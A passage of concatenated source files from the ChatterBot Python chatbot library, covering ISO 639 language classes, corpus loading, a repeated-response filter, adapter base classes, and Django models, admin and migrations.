= '' ISO_639 = 'kom' ENGLISH_NAME = 'Komi' class KON: ISO_639_1 = '' ISO_639 = 'kon' ENGLISH_NAME = 'Kongo' class KOR: ISO_639_1 = 'ko' ISO_639 = 'kor' ENGLISH_NAME = 'Korean' class KOS: ISO_639_1 = '' ISO_639 = 'kos' ENGLISH_NAME = 'Kosraean' class KPE: ISO_639_1 = '' ISO_639 = 'kpe' ENGLISH_NAME = 'Kpelle' class KRC: ISO_639_1 = '' ISO_639 = 'krc' ENGLISH_NAME = 'KarachayBalkar' class KRL: ISO_639_1 = '' ISO_639 = 'krl' ENGLISH_NAME = 'Karelian' class KRU: ISO_639_1 = '' ISO_639 = 'kru' ENGLISH_NAME = 'Kurukh' class KUA: ISO_639_1 = '' ISO_639 = 'kua' ENGLISH_NAME = 'Kuanyama' class KUM: ISO_639_1 = '' ISO_639 = 'kum' ENGLISH_NAME = 'Kumyk' class KUR: ISO_639_1 = '' ISO_639 = 'kur' ENGLISH_NAME = 'Kurdish' class KUT: ISO_639_1 = '' ISO_639 = 'kut' ENGLISH_NAME = 'Kutenai' class LAD: ISO_639_1 = '' ISO_639 = 'lad' ENGLISH_NAME = 'Ladino' class LAH: ISO_639_1 = '' ISO_639 = 'lah' ENGLISH_NAME = 'Lahnda' class LAM: ISO_639_1 = '' ISO_639 = 'lam' ENGLISH_NAME = 'Lamba' class LAO: ISO_639_1 = '' ISO_639 = 'lao' ENGLISH_NAME = 'Lao' class LAT: ISO_639_1 = '' ISO_639 = 'lat' ENGLISH_NAME = 'Latin' class LAV: ISO_639_1 = '' ISO_639 = 'lav' ENGLISH_NAME = 'Latvian' class LEZ: ISO_639_1 = '' ISO_639 = 'lez' ENGLISH_NAME = 'Lezghian' class LIM: ISO_639_1 = '' ISO_639 = 'lim' ENGLISH_NAME = 'Limburgan' class LIN: ISO_639_1 = '' ISO_639 = 'lin' ENGLISH_NAME = 'Lingala' class LIT: ISO_639_1 = '' ISO_639 = 'lit' ENGLISH_NAME = 'Lithuanian' class LOL: ISO_639_1 = '' ISO_639 = 'lol' ENGLISH_NAME = 'Mongo' class LOZ: ISO_639_1 = '' ISO_639 = 'loz' ENGLISH_NAME = 'Lozi' class LTZ: ISO_639_1 = '' ISO_639 = 'ltz' ENGLISH_NAME = 'Luxembourgish' class LUA: ISO_639_1 = '' ISO_639 = 'lua' ENGLISH_NAME = 'LubaLulua' class LUB: ISO_639_1 = '' ISO_639 = 'lub' ENGLISH_NAME = 'LubaKatanga' class LUG: ISO_639_1 = '' ISO_639 = 'lug' ENGLISH_NAME = 'Ganda' class LUI: ISO_639_1 = '' ISO_639 = 'lui' ENGLISH_NAME = 'Luiseno' class LUN: ISO_639_1 = '' ISO_639 = 'lun' ENGLISH_NAME = 'Lunda' class LUO: ISO_639_1 = '' ISO_639 = 'luo' ENGLISH_NAME = 'Luo' class LUS: ISO_639_1 = '' ISO_639 = 'lus' ENGLISH_NAME = 'Lushai' class MAC: ISO_639_1 = '' ISO_639 = 'mac' ENGLISH_NAME = 'Macedonian' class MAD: ISO_639_1 = '' ISO_639 = 'mad' ENGLISH_NAME = 'Madurese' class MAG: ISO_639_1 = '' ISO_639 = 'mag' ENGLISH_NAME = 'Magahi' class MAH: ISO_639_1 = '' ISO_639 = 'mah' ENGLISH_NAME = 'Marshallese' class MAI: ISO_639_1 = '' ISO_639 = 'mai' ENGLISH_NAME = 'Maithili' class MAK: ISO_639_1 = '' ISO_639 = 'mak' ENGLISH_NAME = 'Makasar' class MAL: ISO_639_1 = '' ISO_639 = 'mal' ENGLISH_NAME = 'Malayalam' class MAN: ISO_639_1 = '' ISO_639 = 'man' ENGLISH_NAME = 'Mandingo' class MAO: ISO_639_1 = '' ISO_639 = 'mao' ENGLISH_NAME = 'Maori' class MAR: ISO_639_1 = 'mr' ISO_639 = 'mar' ENGLISH_NAME = 'Marathi' class MAS: ISO_639_1 = '' ISO_639 = 'mas' ENGLISH_NAME = 'Masai' class MAY: ISO_639_1 = '' ISO_639 = 'may' ENGLISH_NAME = 'Malay' class MDF: ISO_639_1 = '' ISO_639 = 'mdf' ENGLISH_NAME = 'Moksha' class MDR: ISO_639_1 = '' ISO_639 = 'mdr' ENGLISH_NAME = 'Mandar' class MEN: ISO_639_1 = '' ISO_639 = 'men' ENGLISH_NAME = 'Mende' class MIC: ISO_639_1 = '' ISO_639 = 'mic' ENGLISH_NAME = 'Mikmaq' class MIN: ISO_639_1 = '' ISO_639 = 'min' ENGLISH_NAME = 'Minangkabau' class MLG: ISO_639_1 = '' ISO_639 = 'mlg' ENGLISH_NAME = 'Malagasy' class MLT: ISO_639_1 = '' ISO_639 = 'mlt' ENGLISH_NAME = 'Maltese' class MNC: ISO_639_1 = '' ISO_639 = 'mnc' ENGLISH_NAME = 'Manchu' class MNI: ISO_639_1 = '' ISO_639 = 'mni' ENGLISH_NAME = 'Manipuri' class MOH: ISO_639_1 = '' ISO_639 = 'moh' ENGLISH_NAME = 'Mohawk' class MON: ISO_639_1 = '' ISO_639 = 'mon' ENGLISH_NAME = 'Mongolian' class MOS: ISO_639_1 = '' ISO_639 = 'mos' ENGLISH_NAME = 'Mossi' class MUS: ISO_639_1 = '' ISO_639 = 'mus' ENGLISH_NAME = 'Creek' class MWL: ISO_639_1 = '' ISO_639 = 'mwl' ENGLISH_NAME = 'Mirandese' class MWR: ISO_639_1 = '' ISO_639 = 'mwr' ENGLISH_NAME = 'Marwari' class MYV: ISO_639_1 = '' ISO_639 = 'myv' ENGLISH_NAME = 'Erzya' class NAP: ISO_639_1 = '' ISO_639 = 'nap' ENGLISH_NAME = 'Neapolitan' class NAU: ISO_639_1 = '' ISO_639 = 'nau' ENGLISH_NAME = 'Nauru' class NAV: ISO_639_1 = '' ISO_639 = 'nav' ENGLISH_NAME = 'Navajo' class NBL: ISO_639_1 = '' ISO_639 = 'nbl' ENGLISH_NAME = 'Ndebele' class NDE: ISO_639_1 = '' ISO_639 = 'nde' ENGLISH_NAME = 'Ndebele' class NDO: ISO_639_1 = '' ISO_639 = 'ndo' ENGLISH_NAME = 'Ndonga' class NEP: ISO_639_1 = '' ISO_639 = 'nep' ENGLISH_NAME = 'Nepali' class NEW: ISO_639_1 = '' ISO_639 = 'new' ENGLISH_NAME = 'NepalBhasa' class NIA: ISO_639_1 = '' ISO_639 = 'nia' ENGLISH_NAME = 'Nias' class NIU: ISO_639_1 = '' ISO_639 = 'niu' ENGLISH_NAME = 'Niuean' class NNO: ISO_639_1 = '' ISO_639 = 'nno' ENGLISH_NAME = 'NorwegianNynorsk' class NOB: ISO_639_1 = '' ISO_639 = 'nob' ENGLISH_NAME = 'Bokmål' class NOG: ISO_639_1 = '' ISO_639 = 'nog' ENGLISH_NAME = 'Nogai' class NOR: ISO_639_1 = '' ISO_639 = 'nor' ENGLISH_NAME = 'Norwegian' class NQO: ISO_639_1 = '' ISO_639 = 'nqo' ENGLISH_NAME = 'NKo' class NSO: ISO_639_1 = '' ISO_639 = 'nso' ENGLISH_NAME = 'Pedi' class NYA: ISO_639_1 = '' ISO_639 = 'nya' ENGLISH_NAME = 'Chichewa' class NYM: ISO_639_1 = '' ISO_639 = 'nym' ENGLISH_NAME = 'Nyamwezi' class NYN: ISO_639_1 = '' ISO_639 = 'nyn' ENGLISH_NAME = 'Nyankole' class NYO: ISO_639_1 = '' ISO_639 = 'nyo' ENGLISH_NAME = 'Nyoro' class NZI: ISO_639_1 = '' ISO_639 = 'nzi' ENGLISH_NAME = 'Nzima' class OJI: ISO_639_1 = '' ISO_639 = 'oji' ENGLISH_NAME = 'Ojibwa' class ORI: ISO_639_1 = 'or' ISO_639 = 'ori' ENGLISH_NAME = 'Oriya' class ORM: ISO_639_1 = '' ISO_639 = 'orm' ENGLISH_NAME = 'Oromo' class OSA: ISO_639_1 = '' ISO_639 = 'osa' ENGLISH_NAME = 'Osage' class OSS: ISO_639_1 = '' ISO_639 = 'oss' ENGLISH_NAME = 'Ossetian' class PAG: ISO_639_1 = '' ISO_639 = 'pag' ENGLISH_NAME = 'Pangasinan' class PAL: ISO_639_1 = '' ISO_639 = 'pal' ENGLISH_NAME = 'Pahlavi' class PAM: ISO_639_1 = '' ISO_639 = 'pam' ENGLISH_NAME = 'Pampanga' class PAN: ISO_639_1 = '' ISO_639 = 'pan' ENGLISH_NAME = 'Panjabi' class PAP: ISO_639_1 = '' ISO_639 = 'pap' ENGLISH_NAME = 'Papiamento' class PAU: ISO_639_1 = '' ISO_639 = 'pau' ENGLISH_NAME = 'Palauan' class PER: ISO_639_1 = 'fa' ISO_639 = 'per' ENGLISH_NAME = 'Persian' class PHN: ISO_639_1 = '' ISO_639 = 'phn' ENGLISH_NAME = 'Phoenician' class PLI: ISO_639_1 = '' ISO_639 = 'pli' ENGLISH_NAME = 'Pali' class POL: ISO_639_1 = '' ISO_639 = 'pol' ENGLISH_NAME = 'Polish' class PON: ISO_639_1 = '' ISO_639 = 'pon' ENGLISH_NAME = 'Pohnpeian' class POR: ISO_639_1 = 'pt' ISO_639 = 'por' ENGLISH_NAME = 'Portuguese' class PUS: ISO_639_1 = '' ISO_639 = 'pus' ENGLISH_NAME = 'Pushto' class QUE: ISO_639_1 = '' ISO_639 = 'que' ENGLISH_NAME = 'Quechua' class RAJ: ISO_639_1 = '' ISO_639 = 'raj' ENGLISH_NAME = 'Rajasthani' class RAP: ISO_639_1 = '' ISO_639 = 'rap' ENGLISH_NAME = 'Rapanui' class RAR: ISO_639_1 = '' ISO_639 = 'rar' ENGLISH_NAME = 'Rarotongan' class ROH: ISO_639_1 = '' ISO_639 = 'roh' ENGLISH_NAME = 'Romansh' class ROM: ISO_639_1 = '' ISO_639 = 'rom' ENGLISH_NAME = 'Romany' class RUM: ISO_639_1 = '' ISO_639 = 'rum' ENGLISH_NAME = 'Romanian' class RUN: ISO_639_1 = '' ISO_639 = 'run' ENGLISH_NAME = 'Rundi' class RUP: ISO_639_1 = '' ISO_639 = 'rup' ENGLISH_NAME = 'Aromanian' class RUS: ISO_639_1 = 'ru' ISO_639 = 'rus' ENGLISH_NAME = 'Russian' class SAD: ISO_639_1 = '' ISO_639 = 'sad' ENGLISH_NAME = 'Sandawe' class SAG: ISO_639_1 = '' ISO_639 = 'sag' ENGLISH_NAME = 'Sango' class SAH: ISO_639_1 = '' ISO_639 = 'sah' ENGLISH_NAME = 'Yakut' class SAM: ISO_639_1 = '' ISO_639 = 'sam' ENGLISH_NAME = 'SamaritanAramaic' class SAN: ISO_639_1 = '' ISO_639 = 'san' ENGLISH_NAME = 'Sanskrit' class SAS: ISO_639_1 = '' ISO_639 = 'sas' ENGLISH_NAME = 'Sasak' class SAT: ISO_639_1 = '' ISO_639 = 'sat' ENGLISH_NAME = 'Santali' class SCN: ISO_639_1 = '' ISO_639 = 'scn' ENGLISH_NAME = 'Sicilian' class SCO: ISO_639_1 = '' ISO_639 = 'sco' ENGLISH_NAME = 'Scots' class SEL: ISO_639_1 = '' ISO_639 = 'sel' ENGLISH_NAME = 'Selkup' class SHN: ISO_639_1 = '' ISO_639 = 'shn' ENGLISH_NAME = 'Shan' class SID: ISO_639_1 = '' ISO_639 = 'sid' ENGLISH_NAME = 'Sidamo' class SIN: ISO_639_1 = '' ISO_639 = 'sin' ENGLISH_NAME = 'Sinhala' class SLO: ISO_639_1 = '' ISO_639 = 'slo' ENGLISH_NAME = 'Slovak' class SLV: ISO_639_1 = '' ISO_639 = 'slv' ENGLISH_NAME = 'Slovenian' class SMA: ISO_639_1 = '' ISO_639 = 'sma' ENGLISH_NAME = 'SouthernSami' class SME: ISO_639_1 = '' ISO_639 = 'sme' ENGLISH_NAME = 'NorthernSami' class SMJ: ISO_639_1 = '' ISO_639 = 'smj' ENGLISH_NAME = 'LuleSami' class SMN: ISO_639_1 = '' ISO_639 = 'smn' ENGLISH_NAME = 'InariSami' class SMO: ISO_639_1 = '' ISO_639 = 'smo' ENGLISH_NAME = 'Samoan' class SMS: ISO_639_1 = '' ISO_639 = 'sms' ENGLISH_NAME = 'SkoltSami' class SNA: ISO_639_1 = '' ISO_639 = 'sna' ENGLISH_NAME = 'Shona' class SND: ISO_639_1 = '' ISO_639 = 'snd' ENGLISH_NAME = 'Sindhi' class SNK: ISO_639_1 = '' ISO_639 = 'snk' ENGLISH_NAME = 'Soninke' class SOG: ISO_639_1 = '' ISO_639 = 'sog' ENGLISH_NAME = 'Sogdian' class SOM: ISO_639_1 = '' ISO_639 = 'som' ENGLISH_NAME = 'Somali' class SOT: ISO_639_1 = '' ISO_639 = 'sot' ENGLISH_NAME = 'Sotho' class SPA: ISO_639_1 = 'es' ISO_639 = 'spa' ENGLISH_NAME = 'Spanish' class SRD: ISO_639_1 = '' ISO_639 = 'srd' ENGLISH_NAME = 'Sardinian' class SRN: ISO_639_1 = '' ISO_639 = 'srn' ENGLISH_NAME = 'SrananTongo' class SRP: ISO_639_1 = '' ISO_639 = 'srp' ENGLISH_NAME = 'Serbian' class SRR: ISO_639_1 = '' ISO_639 = 'srr' ENGLISH_NAME = 'Serer' class SSW: ISO_639_1 = '' ISO_639 = 'ssw' ENGLISH_NAME = 'Swati' class SUK: ISO_639_1 = '' ISO_639 = 'suk' ENGLISH_NAME = 'Sukuma' class SUN: ISO_639_1 = '' ISO_639 = 'sun' ENGLISH_NAME = 'Sundanese' class SUS: ISO_639_1 = '' ISO_639 = 'sus' ENGLISH_NAME = 'Susu' class SUX: ISO_639_1 = '' ISO_639 = 'sux' ENGLISH_NAME = 'Sumerian' class SWA: ISO_639_1 = '' ISO_639 = 'swa' ENGLISH_NAME = 'Swahili' class SWE: ISO_639_1 = 'sv' ISO_639 = 'swe' ENGLISH_NAME = 'Swedish' class SYC: ISO_639_1 = '' ISO_639 = 'syc' ENGLISH_NAME = 'ClassicalSyriac' class SYR: ISO_639_1 = '' ISO_639 = 'syr' ENGLISH_NAME = 'Syriac' class TAH: ISO_639_1 = 'th' ISO_639 = 'tah' ENGLISH_NAME = 'Tahitian' class TAM: ISO_639_1 = '' ISO_639 = 'tam' ENGLISH_NAME = 'Tamil' class TAT: ISO_639_1 = '' ISO_639 = 'tat' ENGLISH_NAME = 'Tatar' class TEL: ISO_639_1 = 'te' ISO_639 = 'tel' ENGLISH_NAME = 'Telugu' class TEM: ISO_639_1 = '' ISO_639 = 'tem' ENGLISH_NAME = 'Timne' class TER: ISO_639_1 = '' ISO_639 = 'ter' ENGLISH_NAME = 'Tereno' class TET: ISO_639_1 = '' ISO_639 = 'tet' ENGLISH_NAME = 'Tetum' class TGK: ISO_639_1 = '' ISO_639 = 'tgk' ENGLISH_NAME = 'Tajik' class TGL: ISO_639_1 = '' ISO_639 = 'tgl' ENGLISH_NAME = 'Tagalog' class THA: ISO_639_1 = '' ISO_639 = 'tha' ENGLISH_NAME = 'Thai' class TIB: ISO_639_1 = '' ISO_639 = 'tib' ENGLISH_NAME = 'Tibetan' class TIG: ISO_639_1 = '' ISO_639 = 'tig' ENGLISH_NAME = 'Tigre' class TIR: ISO_639_1 = '' ISO_639 = 'tir' ENGLISH_NAME = 'Tigrinya' class TIV: ISO_639_1 = '' ISO_639 = 'tiv' ENGLISH_NAME = 'Tiv' class TKL: ISO_639_1 = '' ISO_639 = 'tkl' ENGLISH_NAME = 'Tokelau' class TLH: ISO_639_1 = '' ISO_639 = 'tlh' ENGLISH_NAME = 'Klingon' class TLI: ISO_639_1 = '' ISO_639 = 'tli' ENGLISH_NAME = 'Tlingit' class TMH: ISO_639_1 = '' ISO_639 = 'tmh' ENGLISH_NAME = 'Tamashek' class TOG: ISO_639_1 = '' ISO_639 = 'tog' ENGLISH_NAME = 'Tonga' class TON: ISO_639_1 = '' ISO_639 = 'ton' ENGLISH_NAME = 'Tonga' class TPI: ISO_639_1 = '' ISO_639 = 'tpi' ENGLISH_NAME = 'TokPisin' class TSI: ISO_639_1 = '' ISO_639 = 'tsi' ENGLISH_NAME = 'Tsimshian' class TSN: ISO_639_1 = '' ISO_639 = 'tsn' ENGLISH_NAME = 'Tswana' class TSO: ISO_639_1 = '' ISO_639 = 'tso' ENGLISH_NAME = 'Tsonga' class TUK: ISO_639_1 = '' ISO_639 = 'tuk' ENGLISH_NAME = 'Turkmen' class TUM: ISO_639_1 = '' ISO_639 = 'tum' ENGLISH_NAME = 'Tumbuka' class TUR: ISO_639_1 = '' ISO_639 = 'tur' ENGLISH_NAME = 'Turkish' class TVL: ISO_639_1 = '' ISO_639 = 'tvl' ENGLISH_NAME = 'Tuvalu' class TWI: ISO_639_1 = '' ISO_639 = 'twi' ENGLISH_NAME = 'Twi' class TYV: ISO_639_1 = '' ISO_639 = 'tyv' ENGLISH_NAME = 'Tuvinian' class UDM: ISO_639_1 = '' ISO_639 = 'udm' ENGLISH_NAME = 'Udmurt' class UGA: ISO_639_1 = '' ISO_639 = 'uga' ENGLISH_NAME = 'Ugaritic' class UIG: ISO_639_1 = '' ISO_639 = 'uig' ENGLISH_NAME = 'Uighur' class UKR: ISO_639_1 = '' ISO_639 = 'ukr' ENGLISH_NAME = 'Ukrainian' class UMB: ISO_639_1 = '' ISO_639 = 'umb' ENGLISH_NAME = 'Umbundu' class UND: ISO_639_1 = '' ISO_639 = 'und' ENGLISH_NAME = 'Undetermined' class URD: ISO_639_1 = '' ISO_639 = 'urd' ENGLISH_NAME = 'Urdu' class UZB: ISO_639_1 = '' ISO_639 = 'uzb' ENGLISH_NAME = 'Uzbek' class VAI: ISO_639_1 = '' ISO_639 = 'vai' ENGLISH_NAME = 'Vai' class VEN: ISO_639_1 = '' ISO_639 = 'ven' ENGLISH_NAME = 'Venda' class VIE: ISO_639_1 = '' ISO_639 = 'vie' ENGLISH_NAME = 'Vietnamese' class VOL: ISO_639_1 = '' ISO_639 = 'vol' ENGLISH_NAME = 'Volapük' class VOT: ISO_639_1 = '' ISO_639 = 'vot' ENGLISH_NAME = 'Votic' class WAL: ISO_639_1 = '' ISO_639 = 'wal' ENGLISH_NAME = 'Wolaitta' class WAR: ISO_639_1 = '' ISO_639 = 'war' ENGLISH_NAME = 'Waray' class WAS: ISO_639_1 = '' ISO_639 = 'was' ENGLISH_NAME = 'Washo' class WEL: ISO_639_1 = '' ISO_639 = 'wel' ENGLISH_NAME = 'Welsh' class WLN: ISO_639_1 = '' ISO_639 = 'wln' ENGLISH_NAME = 'Walloon' class WOL: ISO_639_1 = '' ISO_639 = 'wol' ENGLISH_NAME = 'Wolof' class XAL: ISO_639_1 = '' ISO_639 = 'xal' ENGLISH_NAME = 'Kalmyk' class XHO: ISO_639_1 = '' ISO_639 = 'xho' ENGLISH_NAME = 'Xhosa' class YAO: ISO_639_1 = '' ISO_639 = 'yao' ENGLISH_NAME = 'Yao' class YAP: ISO_639_1 = '' ISO_639 = 'yap' ENGLISH_NAME = 'Yapese' class YID: ISO_639_1 = '' ISO_639 = 'yid' ENGLISH_NAME = 'Yiddish' class YOR: ISO_639_1 = '' ISO_639 = 'yor' ENGLISH_NAME = 'Yoruba' class ZAP: ISO_639_1 = '' ISO_639 = 'zap' ENGLISH_NAME = 'Zapotec' class ZBL: ISO_639_1 = '' ISO_639 = 'zbl' ENGLISH_NAME = 'Blissymbols' class ZEN: ISO_639_1 = '' ISO_639 = 'zen' ENGLISH_NAME = 'Zenaga' class ZGH: ISO_639_1 = '' ISO_639 = 'zgh' ENGLISH_NAME = 'StandardMoroccanTamazight' class ZHA: ISO_639_1 = '' ISO_639 = 'zha' ENGLISH_NAME = 'Zhuang' class ZHS: ISO_639_1 = '' ISO_639 = 'zhs' ENGLISH_NAME = 'SimplifiedChinese' class ZHT: ISO_639_1 = '' ISO_639 = 'zht' ENGLISH_NAME = 'TraditionalChinese' class ZUL: ISO_639_1 = '' ISO_639 = 'zul' ENGLISH_NAME = 'Zulu' class ZUN: ISO_639_1 = '' ISO_639 = 'zun' ENGLISH_NAME = 'Zuni' class ZZA: ISO_639_1 = '' ISO_639 = 'zza' ENGLISH_NAME = 'Zaza' def get_language_classes(): import sys import inspect return inspect.getmembers(sys.modules[__name__], inspect.isclass) File: chatterbot/__main__.py import configparser import sys import os def get_chatterbot_version(): config = configparser.ConfigParser() current_directory = os.path.dirname(os.path.abspath(__file__)) parent_directory = os.path.abspath(os.path.join(current_directory, os.pardir)) config_file_path = os.path.join(parent_directory, 'setup.cfg') config.read(config_file_path) return config['chatterbot']['version'] if __name__ == '__main__': if '--version' in sys.argv: print(get_chatterbot_version()) File: chatterbot/filters.py def get_recent_repeated_responses(chatbot, conversation, sample=10, threshold=3, quantity=3): """ A filter that eliminates possibly repetitive responses to prevent a chat bot from repeating statements that it has recently said. """ from collections import Counter # Get the most recent statements from the conversation conversation_statements = list(chatbot.storage.filter( conversation=conversation, order_by=['id'] ))[sample * -1:] text_of_recent_responses = [ statement.text for statement in conversation_statements ] counter = Counter(text_of_recent_responses) # Find the n most common responses from the conversation most_common = counter.most_common(quantity) return [ counted[0] for counted in most_common if counted[1] >= threshold ] File: chatterbot/corpus.py import os import io import glob from pathlib import Path from chatterbot.exceptions import OptionalDependencyImportError try: from chatterbot_corpus.corpus import DATA_DIRECTORY except (ImportError, ModuleNotFoundError): # Default to the home directory of the current user DATA_DIRECTORY = os.path.join( Path.home(), 'chatterbot_corpus', 'data' ) CORPUS_EXTENSION = 'yml' def get_file_path(dotted_path, extension='json'): """ Reads a dotted file path and returns the file path. """ # If the operating system's file path seperator character is in the string if os.sep in dotted_path or '/' in dotted_path: # Assume the path is a valid file path return dotted_path parts = dotted_path.split('.') if parts[0] == 'chatterbot': parts.pop(0) parts[0] = DATA_DIRECTORY corpus_path = os.path.join(*parts) path_with_extension = '{}.{}'.format(corpus_path, extension) if os.path.exists(path_with_extension): corpus_path = path_with_extension return corpus_path def read_corpus(file_name): """ Read and return the data from a corpus json file. """ try: import yaml except ImportError: message = ( 'Unable to import "yaml".\n' 'Please install "pyyaml" to enable chatterbot corpus functionality:\n' 'pip3 install pyyaml' ) raise OptionalDependencyImportError(message) with io.open(file_name, encoding='utf-8') as data_file: return yaml.safe_load(data_file) def list_corpus_files(dotted_path): """ Return a list of file paths to each data file in the specified corpus. """ corpus_path = get_file_path(dotted_path, extension=CORPUS_EXTENSION) paths = [] if os.path.isdir(corpus_path): paths = glob.glob(corpus_path + '/**/*.' + CORPUS_EXTENSION, recursive=True) else: paths.append(corpus_path) paths.sort() return paths def load_corpus(*data_file_paths): """ Return the data contained within a specified corpus. """ for file_path in data_file_paths: corpus = [] corpus_data = read_corpus(file_path) conversations = corpus_data.get('conversations', []) corpus.extend(conversations) categories = corpus_data.get('categories', []) yield corpus, categories, file_path File: chatterbot/adapters.py class Adapter(object): """ A superclass for all adapter classes. :param chatbot: A ChatBot instance. """ def __init__(self, chatbot, **kwargs): self.chatbot = chatbot class AdapterMethodNotImplementedError(NotImplementedError): """ An exception to be raised when an adapter method has not been implemented. Typically this indicates that the developer is expected to implement the method in a subclass. """ def __init__(self, message='This method must be overridden in a subclass method.'): """ Set the message for the exception. """ super().__init__(message) class InvalidAdapterTypeException(Exception): """ An exception to be raised when an adapter of an unexpected class type is received. """ pass File: chatterbot/ext/__init__.py File: chatterbot/ext/django_chatterbot/model_admin.py from django.contrib import admin class StatementAdmin(admin.ModelAdmin): list_display = ('text', 'in_response_to', 'conversation', 'created_at', ) list_filter = ('text', 'created_at', ) search_fields = ('text', ) class TagAdmin(admin.ModelAdmin): list_display = ('name', ) list_filter = ('name', ) search_fields = ('name', ) File: chatterbot/ext/django_chatterbot/abstract_models.py from chatterbot.conversation import StatementMixin from chatterbot import constants from django.db import models from django.utils import timezone from django.conf import settings DJANGO_APP_NAME = constants.DEFAULT_DJANGO_APP_NAME STATEMENT_MODEL = 'Statement' TAG_MODEL = 'Tag' if hasattr(settings, 'CHATTERBOT'): """ Allow related models to be overridden in the project settings. Default to the original settings if one is not defined. """ DJANGO_APP_NAME = settings.CHATTERBOT.get( 'django_app_name', DJANGO_APP_NAME ) STATEMENT_MODEL = settings.CHATTERBOT.get( 'statement_model', STATEMENT_MODEL ) class AbstractBaseTag(models.Model): """ The abstract base tag allows other models to be created using the attributes that exist on the default models. """ name = models.SlugField( max_length=constants.TAG_NAME_MAX_LENGTH, unique=True ) class Meta: abstract = True def __str__(self): return self.name class AbstractBaseStatement(models.Model, StatementMixin): """ The abstract base statement allows other models to be created using the attributes that exist on the default models. """ text = models.CharField( max_length=constants.STATEMENT_TEXT_MAX_LENGTH ) search_text = models.CharField( max_length=constants.STATEMENT_TEXT_MAX_LENGTH, blank=True ) conversation = models.CharField( max_length=constants.CONVERSATION_LABEL_MAX_LENGTH ) created_at = models.DateTimeField( default=timezone.now, help_text='The date and time that the statement was created at.' ) in_response_to = models.CharField( max_length=constants.STATEMENT_TEXT_MAX_LENGTH, null=True ) search_in_response_to = models.CharField( max_length=constants.STATEMENT_TEXT_MAX_LENGTH, blank=True ) persona = models.CharField( max_length=constants.PERSONA_MAX_LENGTH ) tags = models.ManyToManyField( TAG_MODEL, related_name='statements' ) # This is the confidence with which the chat bot believes # this is an accurate response. This value is set when the # statement is returned by the chat bot. confidence = 0 class Meta: abstract = True def __str__(self): if len(self.text.strip()) > 60: return '{}...'.format(self.text[:57]) elif len(self.text.strip()) > 0: return self.text return '<empty>' def get_tags(self): """ Return the list of tags for this statement. (Overrides the method from StatementMixin) """ return list(self.tags.values_list('name', flat=True)) def add_tags(self, *tags): """ Add a list of strings to the statement as tags. (Overrides the method from StatementMixin) """ for _tag in tags: self.tags.get_or_create(name=_tag) File: chatterbot/ext/django_chatterbot/models.py from chatterbot.ext.django_chatterbot.abstract_models import AbstractBaseStatement, AbstractBaseTag class Statement(AbstractBaseStatement): """ A statement represents a single spoken entity, sentence or phrase that someone can say. """ pass class Tag(AbstractBaseTag): """ A label that categorizes a statement. """ pass File: chatterbot/ext/django_chatterbot/__init__.py default_app_config = ( 'chatterbot.ext.django_chatterbot.apps.DjangoChatterBotConfig' ) File: chatterbot/ext/django_chatterbot/apps.py from django.apps import AppConfig class DjangoChatterBotConfig(AppConfig): name = 'chatterbot.ext.django_chatterbot' label = 'django_chatterbot' verbose_name = 'Django ChatterBot' File: chatterbot/ext/django_chatterbot/admin.py from django.contrib import admin from chatterbot.ext.django_chatterbot.model_admin import StatementAdmin, TagAdmin from chatterbot.ext.django_chatterbot.models import Statement, Tag admin.site.register(Statement, StatementAdmin) admin.site.register(Tag, TagAdmin) File: chatterbot/ext/django_chatterbot/settings.py """ Default ChatterBot settings for Django. """ from django.conf import settings from chatterbot import constants CHATTERBOT_SETTINGS = getattr(settings, 'CHATTERBOT', {}) CHATTERBOT_DEFAULTS = { 'name': 'ChatterBot', 'storage_adapter': 'chatterbot.storage.DjangoStorageAdapter', 'django_app_name': constants.DEFAULT_DJANGO_APP_NAME } CHATTERBOT = CHATTERBOT_DEFAULTS.copy() CHATTERBOT.update(CHATTERBOT_SETTINGS) File: chatterbot/ext/django_chatterbot/migrations/0013_change_conversations.py # Generated by Django 1.11 on 2018-09-13 01:01 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0012_statement_created_at'), ] operations = [ migrations.RemoveField( model_name='conversation', name='responses', ), migrations.RemoveField( model_name='response', name='response', ), migrations.RemoveField( model_name='response', name='statement', ), migrations.AddField( model_name='statement', name='conversation', field=models.CharField(default='default', max_length=32), preserve_default=False, ), migrations.AddField( model_name='statement', name='in_response_to', field=models.CharField(max_length=400, null=True), ), migrations.AlterField( model_name='statement', name='text', field=models.CharField(max_length=400), ), migrations.DeleteModel( name='Conversation', ), migrations.DeleteModel( name='Response', ), ] File: chatterbot/ext/django_chatterbot/migrations/0016_statement_stemmed_text.py from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0015_statement_persona'), ] operations = [ migrations.AddField( model_name='statement', name='search_text', field=models.CharField(blank=True, max_length=400), ), migrations.AddField( model_name='statement', name='search_in_response_to', field=models.CharField(blank=True, max_length=400), ), ] File: chatterbot/ext/django_chatterbot/migrations/0018_text_max_length.py from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0017_tags_unique'), ] operations = [ migrations.AlterField( model_name='statement', name='in_response_to', field=models.CharField(max_length=255, null=True), ), migrations.AlterField( model_name='statement', name='search_in_response_to', field=models.CharField(blank=True, max_length=255), ), migrations.AlterField( model_name='statement', name='search_text', field=models.CharField(blank=True, max_length=255), ), migrations.AlterField( model_name='statement', name='text', field=models.CharField(max_length=255), ), ] File: chatterbot/ext/django_chatterbot/migrations/0017_tags_unique.py from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0016_statement_stemmed_text'), ] operations = [ migrations.RemoveField( model_name='tag', name='statements', ), migrations.AddField( model_name='statement', name='tags', field=models.ManyToManyField( related_name='statements', to='django_chatterbot.Tag' ), ), migrations.AlterField( model_name='tag', name='name', field=models.SlugField(unique=True), ), ] File: chatterbot/ext/django_chatterbot/migrations/0004_rename_in_response_to.py # Generated by Django 1.10.3 on 2016-12-04 23:52 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0003_change_occurrence_default'), ] operations = [ migrations.AlterField( model_name='response', name='statement', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='in_response', to='django_chatterbot.Statement'), ), migrations.AlterField( model_name='response', name='response', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='responses', to='django_chatterbot.Statement'), ), ] File: chatterbot/ext/django_chatterbot/migrations/0007_response_created_at.py # Generated by Django 1.11 on 2017-07-18 00:16 from django.db import migrations, models import django.utils.timezone class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0006_create_conversation'), ] operations = [ migrations.AddField( model_name='response', name='created_at', 